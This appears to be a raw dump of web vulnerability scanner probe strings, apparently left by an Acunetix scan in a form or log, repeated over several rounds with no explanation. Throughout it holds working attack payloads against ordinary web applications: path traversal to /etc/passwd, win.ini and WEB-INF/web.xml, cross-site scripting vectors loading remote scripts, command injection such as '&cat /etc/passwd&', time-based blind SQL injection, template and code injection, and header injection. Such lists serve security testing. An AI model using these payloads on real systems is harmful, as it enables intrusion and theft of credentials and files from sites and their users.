..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'"()&%<ScRiPt >prompt(987197)</ScRiPt>

1

z8jTzqg6'))

1

"&dir&"

1

1

1_925640

1

1

|dir

file:///etc/passwd

1

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

1

acu5472\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5472

../../../../../../../../../../boot.ini

acux10461\xc0\xbez1\xc0\xbcz2a\x90bcxuca10461

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(925585)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(967877)</script>

1

1<ScRiPt >prompt(960698)</ScRiPt>

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953570></ScRiPt>

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(975145)</ScRiPt>

1

response.write(9008704*9551822)

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(974408)">

'+response.write(9008704*9551822)+'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972622)"></g></svg>

1

"+response.write(9008704*9551822)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(998924))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

WEB-INF/web.xml

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(959572)>

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900804)>

if(now()=sysdate(),sleep(3.172),0)/*'XOR(if(now()=sysdate(),sleep(3.172),0))OR'"XOR(if(now()=sysdate(),sleep(3.172),0))OR"*/

${100299+99738}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

1

1

1<img src=xyz OnErRor=prompt(998508)>

(select(0)from(select(sleep(3.172)))v)/*'+(select(0)from(select(sleep(3.172)))v)+'"+(select(0)from(select(sleep(3.172)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&n924818=v908573

1<img/src=">" onerror=alert(911420)>

-1

1some_inexistent_file_with_long_name%00.jpg

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

1

1

-1)

1

1<ScRiPt%20>prompt(913553)</sCripT>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

1

'"()

^(#$!@#$)(()))******

testasp.vulnweb.com

1

'

/etc/passwd

"|"ld

Gd9pA1m0'

a7JabrFK'

'"()

1

1&lt

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1

"|"ld

/etc/passwd

YLPZcD47')

'"()

1

1&lt

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1

"|"ld

jnv1DNVk')

/etc/passwd

LmTBrEgH'))

'"()

1

1&lt

^(#$!@#$)(()))******

testasp.vulnweb.com

'

1

"|"ld

/etc/passwd

Bx8QnOBs'))

1

1

\xf6<img acu onmouseover=prompt(980840) //\xf6>

1

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

EKcflcCW'))

-1

1

1

\xf6<img acu onmouseover=prompt(980840) //\xf6>

1

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

1

\xf6<img acu onmouseover=prompt(980840) //\xf6>

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

-1

1

1

\xf6<img acu onmouseover=prompt(980840) //\xf6>

1

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(990112)>

1

${@print(md5(acunetix_wvs_security_test))}

1

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(990112)>

1

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

1

-1))

acunetix_wvs_invalid_filename

http://hitF2ZPAawI3M.bxss.me/

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

1

1

3Ts3E2XC'

||cat /etc/passwd

comments

1

1

file:///etc/passwd

1

i3an7qKK')

1

1

'"

comments

http://www.acunetix.tst

&dir

<!--

1'"()&%<ScRiPt >prompt(971653)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

e4OGVphG'))

1

comments/.

[url=http://www.acunetix.com]website security[/url]

1

'&dir&'

WEB-INF/web.xml

1

1

1

'"()&%<ScRiPt >prompt(988923)</ScRiPt>

1

1

"&dir&"

1

1_9aDoH <ScRiPt >prompt(942567)</ScRiPt>

WEB-INF\web.xml

1_932035

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

acu10013\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10013

1

acux7529\xc0\xbez1\xc0\xbcz2a\x90bcxuca7529

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(961443)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(915381)</script>

1

1

1<ScRiPt >prompt(930019)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956128></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9000031*9578188)

1

1<ScRiPt >prompt(925481)</ScRiPt>

1

'+response.write(9000031*9578188)+'

1

1

1

1<video><source onerror="javascript:prompt(931945)">

"+response.write(9000031*9578188)+"

WEB-INF/web.xml

1

&cat /etc/passwd&

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991384)"></g></svg>

1

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<div style=width:expression(prompt(932488))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(961831)>

1

1

${99736+100259}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

if(now()=sysdate(),sleep(10.125),0)/*'XOR(if(now()=sysdate(),sleep(10.125),0))OR'"XOR(if(now()=sysdate(),sleep(10.125),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938729)>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1<img src=xyz OnErRor=prompt(915291)>

(select(0)from(select(sleep(10.125)))v)/*'+(select(0)from(select(sleep(10.125)))v)+'"+(select(0)from(select(sleep(10.125)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

1&n995837=v957131

-1

1<img/src=">" onerror=alert(985586)>

!(()&&!|*|*|

1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

1<ScRiPt%20>prompt(972322)</sCripT>

1

-1)

^(#$!@#$)(()))******

'"()

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

1

1&lt

-1))

1

1

1

/etc/passwd

1

'

Fn7CNKaL'

1

\xf6<img acu onmouseover=prompt(985520) //\xf6>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

K8rsrf8m')

"

'

1

1<input autofocus onfocus=prompt(930560)>

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

PNj4iHqq'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitr9yFz6kIGO.bxss.me/

1

<a href='http://www.acunetix.com'>website security</a>

"

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

-1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

-1)

1

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

1

comments

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

&dir

comments/.

'"

1_hupHe <ScRiPt >prompt(953076)</ScRiPt>

1

1

1

file:///etc/passwd

'&dir&'

ueCqPsEJ'

1

1

<!--

1

1'"()&%<ScRiPt >prompt(922732)</ScRiPt>

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

ElHpb0iw')

1

'"()&%<ScRiPt >prompt(969701)</ScRiPt>

1

1

1

WEB-INF/web.xml

|dir

BA9wre79'))

1

1_916365

1

1

1

'|dir

1

1

WEB-INF\web.xml

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

acu6893\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6893

1

1

../../../../../../../../../../boot.ini

1

acux3605\xc0\xbez1\xc0\xbcz2a\x90bcxuca3605

1<ScRiPt >prompt(921318)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(939999)</script>

1<ScRiPt >prompt(971045)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959249></ScRiPt>

1<ScRiPt >prompt(921338)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1<video><source onerror="javascript:prompt(903086)">

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(909868)"></g></svg>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<div style=width:expression(prompt(928528))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9248397*9817514)

1

1

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

'+response.write(9248397*9817514)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(949347)>

1

1

"+response.write(9248397*9817514)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979845)>

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(992080)>

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(932342)>

1

1

WEB-INF\web.xml

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd

1

1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(923209)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99226+99640}

-1

1

1

1

1&lt

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

1

1&n949016=v973027

1

-1)

1

)

1

\xf6<img acu onmouseover=prompt(926884) //\xf6>

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(945684)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

'"()

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'

iSd5g4bw'

^(#$!@#$)(()))******

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"

oue5VtEe')

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

'

atY4RsbE')

${@print(md5(acunetix_wvs_security_test))}

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1_GGceQ <ScRiPt >prompt(914990)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

IZ38J2ia')

${@print(md5(acunetix_wvs_security_test))}\

1

1

/etc/passwd

1

1

acunetix_wvs_invalid_filename

W7ASM0uH'))

1

1

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitDQOdC0N6sU.bxss.me/

1

1

1

-1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

http://www.acunetix.tst

comments

1

1

'&dir&'

-1))

'"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1'"()&%<ScRiPt >prompt(943209)</ScRiPt>

comments/.

1

1

<!--

qMh5kpQ1'

1

'"()&%<ScRiPt >prompt(901781)</ScRiPt>

1

"&dir&"

1

K7Tw6eoV')

1

1_926468

1

1

|dir

file:///etc/passwd

1

3CyIfTWL'))

1

1

1

1

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

WEB-INF/web.xml

acu6826\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6826

1

1

1

WEB-INF\web.xml

1

acux7764\xc0\xbez1\xc0\xbcz2a\x90bcxuca7764

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(959641)</ScRiPt>

1

1

1<script>prompt(989430)</script>

../../../../../../../../../../boot.ini

1

1

1

1

1<ScRiPt >prompt(924968)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953461></ScRiPt>

1

1

1

response.write(9001358*9815104)

................windowswin.ini

1<ScRiPt >prompt(918526)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

'+response.write(9001358*9815104)+'

1

1

1<video><source onerror="javascript:prompt(904251)">

"+response.write(9001358*9815104)+"

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950519)"></g></svg>

1

&cat /etc/passwd&

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(936391))>

SomeCustomInjectedHeader:injected_by_wvs

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<body onload=prompt(958721)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960832)>

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

WEB-INF\web.xml

`cat /etc/passwd`

${100088+99557}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(960531)>

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(989009)>

-1

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(913635)</sCripT>

-1)

'|'ld

1&n954186=v963271

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'"()

!(()&&!|*|*|

testasp.vulnweb.com

"|"ld

1

orDZSHWb'

1

\xf6<img acu onmouseover=prompt(968616) //\xf6>

PX4MhIso')

1

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

92ViytGe'))

1

1<input autofocus onfocus=prompt(915981)>

'

1

1

1

'

/etc/passwd

1

1

-1

"

<a href='http://www.acunetix.com'>website security</a>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1))

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1_Eu894 <ScRiPt >prompt(935695)</ScRiPt>

1

http://hitWDnF7OVn67.bxss.me/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

hSSSLtRa'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

acunetix_wvs_invalid_filename

1

'&dir&'

1

http://www.acunetix.tst

1

sZalb0oL')

1

file:///etc/passwd

comments

'"

1

"&dir&"

1

1

1

1

OOkl7a3k'))

comments

<!--

|dir

1'"()&%<ScRiPt >prompt(983903)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

comments/.

1

'|dir

'"()&%<ScRiPt >prompt(923877)</ScRiPt>

WEB-INF/web.xml

1

1

1

"|dir

1_943102

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu3838\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3838

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux6014\xc0\xbez1\xc0\xbcz2a\x90bcxuca6014

1

1

1<ScRiPt >prompt(990214)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(968746)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(921240)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?908024></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(995707)</ScRiPt>

1

1

response.write(9579713*9398830)

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(978339)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9579713*9398830)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(923642)"></g></svg>

1

"+response.write(9579713*9398830)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1<div style=width:expression(prompt(949964))>

WEB-INF/web.xml

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1

1<iframe src='data:text/html

WEB-INF\web.xml

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${99644+99181}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<body onload=prompt(903340)>

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n923159=v996540

1

|cat /etc/passwd#

1

1

1some_inexistent_file_with_long_name%00.jpg

)

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903737)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

!(()&&!|*|*|

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(932813)>

1

testasp.vulnweb.com

^(#$!@#$)(()))******

'"()

"|"ld

iVCJhU7s'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1<img/src=">" onerror=alert(963819)>

1

1

1

1<ScRiPt%20>prompt(924107)</sCripT>

/etc/passwd

16kCihZR')

"

1

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1&lt

lSmRCgno'))

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

1

1

-1

${@print(md5(acunetix_wvs_security_test))}\

\xf6<img acu onmouseover=prompt(996785) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

acunetix_wvs_invalid_filename

-1)

http://hitPhlNvOzHWw.bxss.me/

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1<input autofocus onfocus=prompt(972713)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

1

1

-1))

&dir

comments

1

<a href='http://www.acunetix.com'>website security</a>

1

1

M30FApT9'

http://www.acunetix.tst

comments/.

file:///etc/passwd

'&dir&'

'"

1'"()&%<ScRiPt >prompt(962763)</ScRiPt>

[url=http://www.acunetix.com]website security[/url]

1

1

imhMbWYv')

1

"&dir&"

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1_t2riW <ScRiPt >prompt(984617)</ScRiPt>

'"()&%<ScRiPt >prompt(930986)</ScRiPt>

1

nBbC6HBr'))

1

1

WEB-INF/web.xml

|dir

1

1

1

1

1

1_966156

1

WEB-INF\web.xml

1

1

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu2125\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2125

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2456\xc0\xbez1\xc0\xbcz2a\x90bcxuca2456

1

................windowswin.ini

1

1

1<ScRiPt >prompt(912879)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(959476)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(963272)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912440></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(985218)</ScRiPt>

1

1<video><source onerror="javascript:prompt(926252)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959022)"></g></svg>

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(994004))>

1

1

WEB-INF\web.xml

response.write(9130926*9088585)

1

1<iframe src='data:text/html

1

1

'+response.write(9130926*9088585)+'

1

1

1<body onload=prompt(977957)>

&cat /etc/passwd&

1

1

"+response.write(9130926*9088585)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(962137)>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(907001)>

1

if(now()=sysdate(),sleep(17.594),0)/*'XOR(if(now()=sysdate(),sleep(17.594),0))OR'"XOR(if(now()=sysdate(),sleep(17.594),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<img/src=">" onerror=alert(946394)>

1

1

(select(0)from(select(sleep(17.594)))v)/*'+(select(0)from(select(sleep(17.594)))v)+'"+(select(0)from(select(sleep(17.594)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt%20>prompt(963717)</sCripT>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

1

1

-1

1

-1)

1&lt

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1

1

-1))

${100218+99038}

1

\xf6<img acu onmouseover=prompt(946890) //\xf6>

../../../../../../../../../../etc/passwd.jpg

1

|cat /etc/passwd#

1

1

lmTWmmen'

1

1

1<input autofocus onfocus=prompt(905615)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

